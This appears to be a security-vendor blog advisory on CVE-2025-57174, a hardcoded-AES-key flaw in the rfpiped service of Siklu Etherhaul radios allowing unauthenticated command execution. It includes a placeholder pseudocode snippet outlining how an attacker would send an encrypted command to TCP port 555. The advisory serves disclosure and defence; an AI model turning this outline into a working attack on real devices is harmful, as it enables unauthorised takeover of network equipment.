Ameeba Blog Logo
Ameeba Chat App store presentation
Download Ameeba Chat Today
Ameeba Blog Search

CVE-2025-57174: Persistent Vulnerability in Siklu Communications Etherhaul Devices Due to Hardcoded AES Encryption Keys

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Overview

We delve into a critical vulnerability, CVE-2025-57174, that was discovered in Siklu Communications Etherhaul 8010TX and 1200FX devices. This vulnerability affects Firmware 7.4.0 through 10.7.3 and possibly other previous versions. Potentially exposing these devices to system compromise or data leakage, this vulnerability has become a significant security concern in the cybersecurity landscape. Given the widespread use of these devices in various industries, the implications of this vulnerability are far-reaching, necessitating immediate attention and action.

Vulnerability Summary

CVE ID: CVE-2025-57174
Severity: Critical (9.8 CVSS score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage

Affected Products

Ameeba Chat Icon Escape the Surveillance Era

Most apps won’t tell you the truth.
They’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

Siklu Communications Etherhaul 8010TX | Firmware 7.4.0 through 10.7.3
Siklu Communications Etherhaul 1200FX | Firmware 7.4.0 through 10.7.3

How the Exploit Works

The vulnerability arises from the `rfpiped` service listening on TCP port 555, which uses static AES encryption keys hardcoded into the binary. These keys are identical across all devices, making it possible for attackers to craft and send encrypted packets that execute arbitrary commands without authentication. This method of attack bypasses the need for user interaction and does not require any privileges, making it particularly dangerous.

Conceptual Example Code

Given the nature of this vulnerability, an attacker could exploit it by crafting an encrypted packet containing a malicious command using the hardcoded AES encryption key. Here is a conceptual example, represented in Python-like pseudocode:

import socket
import AES
TCP_IP = 'target_IP'
TCP_PORT = 555
BUFFER_SIZE = 1024
# The hardcoded AES key
AES_KEY = 'hardcoded_key'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
# Crafting malicious command
command = 'arbitrary_command'
encrypted_command = AES.encrypt(command, AES_KEY)
s.send(encrypted_command)
data = s.recv(BUFFER_SIZE)
s.close()
print("received data:", data)

In this example, a TCP connection is established with the target device on port 555. A command is then encrypted using the hardcoded AES key and sent to the device. The device, recognizing the key, would then decrypt and execute the command, thereby compromising the system.

Talk freely. Stay anonymous with Ameeba Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.

More posts

Ameeba Chat